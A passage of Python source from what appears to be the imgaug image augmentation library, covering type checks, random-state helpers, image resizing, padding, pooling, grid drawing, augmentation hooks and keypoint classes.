Returns
-------
out : bool
True if the variable is a string. Otherwise False.
"""
return isinstance(val, six.string_types)
def is_integer_array(val):
"""
Checks whether a variable is a numpy integer array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy integer array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.integer)
def is_float_array(val):
"""
Checks whether a variable is a numpy float array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy float array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.floating)
def is_callable(val):
"""
Checks whether a variable is a callable, e.g. a function.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a callable. Otherwise False.
"""
# python 3.x with x <= 2 does not support callable(), apparently
if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
return hasattr(val, '__call__')
else:
return callable(val)
def caller_name():
"""
Returns the name of the caller, e.g. a function.
Returns
-------
name : str
The name of the caller as a string
"""
return sys._getframe(1).f_code.co_name
def seed(seedval):
"""
Set the seed used by the global random state and thereby all randomness
in the library.
This random state is by default by all augmenters. Under special
circumstances (e.g. when an augmenter is switched to deterministic mode),
the global random state is replaced by another -- local -- one.
The replacement is dependent on the global random state.
Parameters
----------
seedval : int
The seed to
use.
"""
CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
"""
Returns the current/global random state of the library.
Returns
----------
out : np.random.RandomState
The current/global random state.
"""
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
"""
Returns a new random state.
Parameters
----------
seed : None or int, optional(default=None)
Optional seed value to use.
The same datatypes are allowed as for np.random.RandomState(seed).
fully_random : bool, optional(default=False)
Whether to use numpy's random initialization for the
RandomState (used if set to True). If False, a seed is sampled from
the global random state, which is a bit faster and hence the default.
Returns
-------
out : np.random.RandomState
The new random state.
"""
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
"""
Returns a dummy random state that is always based on a seed of 1.
Returns
-------
out : np.random.RandomState
The new random state.
"""
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
"""
Creates a copy of a random state.
Parameters
----------
random_state : np.random.RandomState
The random state to
copy.
force_copy : bool, optional(default=False)
If True, this function will always create a copy of every random
state. If False, it will not copy numpy's default random state,
but all other random states.
Returns
-------
rs_copy : np.random.RandomState
The copied random state.
"""
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
def derive_random_state(random_state):
"""
Create a new random states based on an existing random state or seed.
Parameters
----------
random_state : np.random.RandomState
Random state or seed from which to derive the new random state.
Returns
-------
result : np.random.RandomState
Derived random state.
"""
return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
"""
Create N new random states based on an existing random state or seed.
Parameters
----------
random_state : np.random.RandomState
Random state or seed from which to derive new random states.
n : int, optional(default=1)
Number of random states to derive.
Returns
-------
result : list of np.random.RandomState
Derived random states.
"""
seed = random_state.randint(0, 10**6, 1)[0]
return [new_random_state(seed+i) for i in sm.xrange(n)]
def forward_random_state(random_state):
"""
Forward the internal state of a random state.
This makes sure that future calls to the random_state will produce new random values.
Parameters
----------
random_state : np.random.RandomState
Random state to forward.
"""
random_state.uniform()
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
"""
Returns an image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
if size is not None:
img = misc.imresize(img, size)
return img
def quokka_square(size=None):
"""
Returns an (square) image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
img = img[0:643, 0:643]
if size is not None:
img = misc.imresize(img, size)
return img
def angle_between_vectors(v1, v2):
"""
Returns the angle in radians between vectors 'v1' and 'v2'.
From http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python
Parameters
----------
{v1, v2} : (N,) ndarray
Input
vectors.
Returns
-------
out : float
Angle in radians.
Examples
--------
>>> angle_between((1, 0, 0), (0, 1, 0))
1.5707963267948966
>>> angle_between((1, 0, 0), (1, 0, 0))
0.0
>>> angle_between((1, 0, 0), (-1, 0, 0))
3.141592653589793
"""
v1_u = v1 / np.linalg.norm(v1)
v2_u = v2 / np.linalg.norm(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def draw_text(img, y, x, text, color=[0, 255, 0], size=25): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw text on an image.
This uses by default DejaVuSans as its font, which is included in the
library.
Parameters
----------
img : (H,W,3) ndarray
The image array to draw text on.
Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
{y, x} : int
x- and y- coordinate of the top left corner of the
text.
color : iterable of 3 ints, optional(default=[0, 255, 0])
Color of the text to draw. For RGB-images this is expected to be
an RGB color.
size : int, optional(default=25)
Font size of the text to
draw.
Returns
-------
img_np : (H,W,3) ndarray
Input image with text drawn on it.
"""
# keeping PIL here so that it is not a dependency of the library right now
from PIL import Image, ImageDraw, ImageFont
do_assert(img.dtype in [np.uint8, np.float32])
input_dtype = img.dtype
if img.dtype == np.float32:
img = img.astype(np.uint8)
for i in range(len(color)):
val = color[i]
if isinstance(val, float):
val = int(val * 255)
val = np.clip(val, 0, 255)
color[i] = val
img = Image.fromarray(img)
font = ImageFont.truetype(DEFAULT_FONT_FP, size)
context = ImageDraw.Draw(img)
context.text((x, y), text, fill=tuple(color), font=font)
img_np = np.asarray(img)
img_np.setflags(write=True) # PIL/asarray returns read only array
if img_np.dtype != input_dtype:
img_np = img_np.astype(input_dtype)
return img_np
# TODO rename sizes to size?
def imresize_many_images(images, sizes=None, interpolation=None):
"""
Resize many images to a specified size.
Parameters
----------
images : (N,H,W,C) ndarray
Array of the images to resize.
Expected to usually be of dtype uint8.
sizes : float or iterable of two ints or iterable of two floats
The new size of the images, given either as a fraction (a single float) or as
a (height, width) tuple of two integers or as a (height fraction, width fraction)
tuple of two floats.
interpolation : None or string or int, optional(default=None)
The interpolation to use during resize.
If int, then expected to be one of:
* cv2.INTER_NEAREST (nearest neighbour interpolation)
* cv2.INTER_LINEAR (linear interpolation)
* cv2.INTER_AREA (area interpolation)
* cv2.INTER_CUBIC (cubic interpolation)
If string, then expected to be one of:
* "nearest" (identical to cv2.INTER_NEAREST)
* "linear" (identical to cv2.INTER_LINEAR)
* "area" (identical to cv2.INTER_AREA)
* "cubic" (identical to cv2.INTER_CUBIC)
If None, the interpolation will be chosen automatically. For size
increases, area interpolation will be picked and for size decreases,
linear interpolation will be picked.
Returns
-------
result : (N,H',W',C) ndarray
Array of the resized images.
Examples
--------
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), 2.0)
Converts 2 RGB images of height and width 16 to images of height and width 16*2 = 32.
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), (16, 32))
Converts 2 RGB images of height and width 16 to images of height 16 and width 32.
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), (2.0, 4.0))
Converts 2 RGB images of height and width 16 to images of height 32 and width 64.
"""
shape = images.shape
do_assert(images.ndim == 4, "Expected array of shape (N, H, W, C), got shape %s" % (str(shape),))
nb_images = shape[0]
im_height, im_width = shape[1], shape[2]
nb_channels = shape[3]
if is_single_float(sizes):
do_assert(sizes > 0.0)
height = int(round(im_height * sizes))
width = int(round(im_width * sizes))
else:
do_assert(len(sizes) == 2)
all_int = all([is_single_integer(size) for size in sizes])
all_float = all([is_single_float(size) for size in sizes])
do_assert(all_int or all_float)
if all_int:
height, width = sizes[0], sizes[1]
else:
height = int(round(im_height * sizes[0]))
width = int(round(im_width * sizes[1]))
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
do_assert(ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC])
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
else: # if ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
result = np.zeros((nb_images, height, width, nb_channels), dtype=images.dtype)
for img_idx in sm.xrange(nb_images):
# TODO fallback to scipy here if image isn't uint8
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img.astype(images.dtype)
return result
def imresize_single_image(image, sizes, interpolation=None):
"""
Resizes a single image.
Parameters
----------
image : (H,W,C) ndarray or (H,W) ndarray
Array of the image to resize.
Expected to usually be of dtype uint8.
sizes : float or iterable of two ints or iterable of two floats
See `imresize_many_images()`.
interpolation : None or string or int, optional(default=None)
See `imresize_many_images()`.
Returns
-------
out : (H',W',C) ndarray or (H',W') ndarray
The resized image.
"""
grayscale = False
if image.ndim == 2:
grayscale = True
image = image[:, :, np.newaxis]
do_assert(len(image.shape) == 3, image.shape)
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def pad(arr, top=0, right=0, bottom=0, left=0, mode="constant", cval=0):
"""
Pad an image-like array on its top/right/bottom/left side.
This function is a wrapper around `numpy.pad()`.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pad.
top : int, optional(default=0)
Amount of pixels to add at the top side of the image. Must be 0 or greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the image. Must be 0 or greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the image. Must be 0 or greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the image. Must be 0 or greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
arr_pad : (H',W') or (H',W',C) ndarray
Padded array with height H'=H+top+bottom and width W'=W+left+right.
"""
assert arr.ndim in [2, 3]
assert top >= 0
assert right >= 0
assert bottom >= 0
assert left >= 0
if top > 0 or right > 0 or bottom > 0 or left > 0:
paddings_np = [(top, bottom), (left, right)] # paddings for 2d case
if arr.ndim == 3:
paddings_np.append((0, 0)) # add paddings for 3d case
if mode == "constant":
arr_pad = np.pad(
arr,
paddings_np,
mode=mode,
constant_values=cval
)
else:
arr_pad = np.pad(
arr,
paddings_np,
mode=mode
)
return arr_pad
else:
return np.copy(arr)
def compute_paddings_for_aspect_ratio(arr, aspect_ratio):
"""
Compute the amount of pixels by which an array has to be padded to fulfill an aspect ratio.
The aspect ratio is given as width/height.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array for which to compute pad amounts.
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
Returns
-------
result : tuple of ints
Required paddign amounts to reach the target aspect ratio, given as a tuple
of the form (top, right, bottom, left).
"""
assert arr.ndim in [2, 3]
assert aspect_ratio > 0
height, width = arr.shape[0:2]
assert height > 0
aspect_ratio_current = width / height
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
if aspect_ratio_current < aspect_ratio:
# vertical image, height > width
diff = (aspect_ratio * height) - width
pad_right = int(np.ceil(diff / 2))
pad_left = int(np.floor(diff / 2))
elif aspect_ratio_current > aspect_ratio:
# horizontal image, width > height
diff = ((1/aspect_ratio) * width) - height
pad_top = int(np.ceil(diff / 2))
pad_bottom = int(np.floor(diff / 2))
return (pad_top, pad_right, pad_bottom, pad_left)
def pad_to_aspect_ratio(arr, aspect_ratio, mode="constant", cval=0, return_pad_amounts=False):
"""
Pad an image-like array on its sides so that it matches a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pad.
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
First tuple entry: Padded image as (H',W') or (H',W',C) ndarray, fulfulling the given
aspect_ratio.
Second tuple entry: Amounts by which the image was padded on each side, given
as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the image is returned.
"""
pad_top, pad_right, pad_bottom, pad_left = compute_paddings_for_aspect_ratio(arr, aspect_ratio)
arr_padded = pad(
arr,
top=pad_top,
right=pad_right,
bottom=pad_bottom,
left=pad_left,
mode=mode,
cval=cval
)
if return_pad_amounts:
return arr_padded, (pad_top, pad_right, pad_bottom, pad_left)
else:
return arr_padded
def pool(arr, block_size, func, cval=0, preserve_dtype=True):
"""
Rescale an array by pooling values within blocks.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. Ideally of datatype np.float64.
block_size : int or tuple of two ints or tuple of three ints
Spatial size of each group of each values to pool, aka kernel size.
If a single integer, then a symmetric block of that size along height and width will
be used.
If a tuple of two values, it is assumed to be the block size along height and width
of the image-like, with pooling happening per channel.
If a tuple of three values, it is assuemd to be the block size along height, width and
channels.
func : callable
Function to apply to a given block in order to convert it to a single number,
e.g. np.average, np.min, np.max.
cval : number, optional(default=0)
Value to use in order to pad the array along its border if the array cannot be divided
by block_size without remainder.
preserve_dtype : bool, optional(default=True)
Whether to convert the array back to the input datatype if it is changed away from
that in the pooling process.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after pooling.
"""
assert arr.ndim in [2, 3]
is_valid_int = is_single_integer(block_size) and block_size >= 1
is_valid_tuple = is_iterable(block_size) and len(block_size) in [2, 3] and [is_single_integer(val) and val >= 1 for val in block_size]
assert is_valid_int or is_valid_tuple
if is_single_integer(block_size):
block_size = [block_size, block_size]
if len(block_size) < arr.ndim:
block_size = list(block_size) + [1]
input_dtype = arr.dtype
arr_reduced = skimage.measure.block_reduce(arr, tuple(block_size), func, cval=cval)
if preserve_dtype and arr_reduced.dtype.type != input_dtype:
arr_reduced = arr_reduced.astype(input_dtype)
return arr_reduced
def avg_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Rescale an array using average pooling.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. See `pool()` for details.
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool. See `pool()` for details.
cval : number, optional(default=0)
Padding value. See `pool()` for details.
preserve_dtype : bool, optional(default=True)
Whether to preserve the input array dtype. See `pool()` for details.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after average pooling.
"""
return pool(arr, block_size, np.average, cval=cval, preserve_dtype=preserve_dtype)
def max_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Rescale an array using max-pooling.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. See `pool()` for details.
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool. See `pool()` for details.
cval : number, optional(default=0)
Padding value. See `pool()` for details.
preserve_dtype : bool, optional(default=True)
Whether to preserve the input array dtype. See `pool()` for details.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after max-pooling.
"""
return pool(arr, block_size, np.max, cval=cval, preserve_dtype=preserve_dtype)
def draw_grid(images, rows=None, cols=None):
"""
Converts multiple input images into a single image showing them in a grid.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
The input images to convert to a grid.
Expected to be RGB and have dtype uint8.
rows : None or int, optional(default=None)
The number of rows to show in the grid.
If None, it will be automatically derived.
cols : None or int, optional(default=None)
The number of cols to show in the grid.
If None, it will be automatically derived.
Returns
-------
grid : (H',W',3) ndarray
Image of the generated grid.
"""
if is_np_array(images):
do_assert(images.ndim == 4)
else:
do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
nb_images = len(images)
do_assert(nb_images > 0)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
do_assert(rows * cols >= nb_images)
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels), dtype=np.uint8)
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
"""
Converts the input images to a grid image and shows it in a new window.
This function wraps around scipy.misc.imshow(), which requires the
`see <image>` command to work. On Windows systems, this tends to not be
the case.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
See `draw_grid()`.
rows : None or int, optional(default=None)
See `draw_grid()`.
cols : None or int, optional(default=None)
See `draw_grid()`.
"""
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
def do_assert(condition, message="Assertion failed."):
"""
Function that behaves equally to an `assert` statement, but raises an
Exception.
This is added because `assert` statements are removed in optimized code.
It replaces `assert` statements throughout the library that should be
kept even in optimized code.
Parameters
----------
condition : bool
If False, an exception is raised.
message : string, optional(default="Assertion failed.")
Error message.
"""
if not condition:
raise AssertionError(str(message))
class HooksImages(object):
"""
Class to intervene with image augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
Parameters
----------
activator : None or callable, optional(default=None)
A function that gives permission to execute an augmenter.
The expected interface is `f(images, augmenter, parents, default)`,
where `images` are the input images to augment, `augmenter` is the
instance of the augmenter to execute, `parents` are previously
executed augmenters and `default` is an expected default value to be
returned if the activator function does not plan to make a decision
for the given inputs.
propagator : None or callable, optional(default=None)
A function that gives permission to propagate the augmentation further
to the children of an augmenter. This happens after the activator.
In theory, an augmenter may augment images itself (if allowed by the
activator) and then execute child augmenters afterwards (if allowed by
the propagator). If the activator returned False, the propagation step
will never be executed.
The expected interface is `f(images, augmenter, parents, default)`,
with all arguments having identical meaning to the activator.
preprocessor : None or callable, optional(default=None)
A function to call before an augmenter performed any augmentations.
The interface is `f(images, augmenter, parents)`,
with all arguments having identical meaning to the activator.
It is expected to return the input images, optionally modified.
postprocessor : None or callable, optional(default=None)
A function to call after an augmenter performed augmentations.
The interface is the same as for the preprocessor.
Examples
--------
>>> seq = iaa.Sequential([
>>> iaa.GaussianBlur(3.0, name="blur"),
>>> iaa.Dropout(0.05, name="dropout"),
>>> iaa.Affine(translate_px=-5, name="affine")
>>> ])
>>>
>>> def activator(images, augmenter, parents, default):
>>> return False if augmenter.name in ["blur", "dropout"] else default
>>>
>>> seq_det = seq.to_deterministic()
>>> images_aug = seq_det.augment_images(images)
>>> heatmaps_aug = seq_det.augment_images(
>>> heatmaps,
>>> hooks=ia.HooksImages(activator=activator)
>>> )
This augments images and their respective heatmaps in the same way.
The heatmaps however are only modified by Affine, not by GaussianBlur or
Dropout.
"""
#def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None, propagation_method=None):
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
#self.propagation_method = propagation_method
def is_activated(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may be executed.
Returns
-------
out : bool
If True, the augmenter may be executed. If False, it may
not be executed.
"""
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may call its children to augment an
image. This is independent of the augmenter itself possible changing
the image, without calling its children. (Most (all?) augmenters with
children currently dont perform any changes themselves.)
Returns
-------
out : bool
If True, the augmenter may be propagate to its children.
If False, it may not.
"""
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
#def get_propagation_method(self, images, augmenter, parents, child, default):
# if self.propagation_method is None:
# return default
# else:
# return self.propagation_method(images, augmenter, parents, child, default)
def preprocess(self, images, augmenter, parents):
"""
A function to be called before the augmentation of images starts (per
augmenter).
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
"""
A function to be called after the augmentation of images was
performed.
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksHeatmaps(HooksImages):
"""
Class to intervene with heatmap augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class HooksKeypoints(HooksImages):
"""
Class to intervene with keypoint augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class Keypoint(object):
"""
A single keypoint (aka landmark) on an image.
Parameters
----------
x : number
Coordinate of the keypoint on the x axis.
y : number
Coordinate of the keypoint on the y axis.
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
@property
def x_int(self):
"""
Return the keypoint's x-coordinate, rounded to the closest integer.
Returns
-------
result : int
Keypoint's x-coordinate, rounded to the closest integer.
"""
return int(round(self.x))
@property
def y_int(self):
"""
Return the keypoint's y-coordinate, rounded to the closest integer.
Returns
-------
result : int
Keypoint's y-coordinate, rounded to the closest integer.
"""
return int(round(self.y))
def project(self, from_shape, to_shape):
"""
Project the keypoint onto a new position on a new image.
E.g. if the keypoint is on its original image at x=(10 of 100 pixels)
and y=(20 of 100 pixels) and is projected onto a new image with
size (width=200, height=200), its new position will be (20, 40).
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = (self.x / from_width) * to_width
y = (self.y / from_height) * to_height
return Keypoint(x=x, y=y)
def shift(self, x=0, y=0):
"""
Move the keypoint around on an image.
Parameters
----------
x : number, optional(default=0)
Move by this value on the x axis.
y : number, optional(default=0)
Move by this value on the y axis.
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
"""
Object that represents all keypoints on a single image.
Parameters
----------
keypoints : list of Keypoint
List of keypoints on the image.
shape : tuple of int
The shape of the image on which the keypoints are placed.
Examples
--------
>>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
>>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
"""
def __init__(self, keypoints, shape):
#assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
@property
def empty(self):
"""
Returns whether this object contains zero keypoints.
Returns
-------
result : bool
True if this object contains zero keypoints.
"""
return len(self.keypoints) == 0
def on(self, image):
"""
Project keypoints from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the keypoints are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : KeypointsOnImage
Object containing all projected keypoints.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw all keypoints onto a given image. Each keypoint is marked by a
square of a chosen color and size.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the keypoints.
This image should usually have the same shape as
set in KeypointsOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all keypoints. If a single int `C`, then that is
equivalent to (C,C,C).
size : int, optional(default=3)
The size of each point. If set to C, each square will have
size CxC.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any keypoint is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn keypoints.
"""
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y_int, keypoint.x_int
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x=0, y=0):
"""
Move the keypoints around on an image.
Parameters
----------
x : number, optional(default=0)
Move each keypoint by this value on the x axis.
y : number, optional(default=0)
Move each keypoint by this value on the y axis.
Returns
-------
out : KeypointsOnImage
Keypoints after moving them.
"""
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
"""
Convert the coordinates of all keypoints in this object to
an array of shape (N,2).
Returns
-------
result : (N, 2) ndarray
Where N is the number of keypoints. Each first value is the
x coordinate, each second value is the y coordinate.
"""
result = np.zeros((len(self.keypoints), 2), np.float32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
"""
Convert an array (N,2) with a given image shape to a KeypointsOnImage
object.
Parameters
----------
coords : (N, 2) ndarray
Coordinates of N keypoints on the original image.
Each first entry (i, 0) is expected to be the x coordinate.
Each second entry (i, 1) is expected to be the y coordinate.
shape : tuple
Shape tuple of the image on which the keypoints are placed.
Returns
-------
out : KeypointsOnImage
KeypointsOnImage object that contains all keypoints from the array.
"""
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self, size=1):
"""
Draws a new black image of shape (H,W,N) in which all keypoint coordinates
are set to 255.
(H=shape height, W=shape width, N=number of keypoints)
This function can be used as a helper when augmenting keypoints with
a method that only supports the augmentation of images.
Parameters
-------
size : int
Size of each (squared) point.
Returns
-------
image : (H,W,N) ndarray
Image in which the keypoints are marked. H is the height,
defined in KeypointsOnImage.shape[0] (analogous W). N is the
number of keypoints.
"""
do_assert(len(self.keypoints) > 0)
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
do_assert(size % 2 != 0)
sizeh = max(0, (size-1)//2)
for i, keypoint in enumerate(self.keypoints):
# TODO for float values spread activation over several cells
# here and do voting at the end
y = keypoint.y_int
x = keypoint.x_int
x1 = np.clip(x - sizeh, 0, width-1)
x2 = np.clip(x + sizeh + 1, 0, width)
y1 = np.clip(y - sizeh, 0, height-1)
y2 = np.clip(y + sizeh + 1, 0, height)
#if 0 <= y < height and 0 <= x < width:
# image[y, x, i] = 255
if x1 < x2 and y1 < y2:
image[y1:y2, x1:x2, i] = 128
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
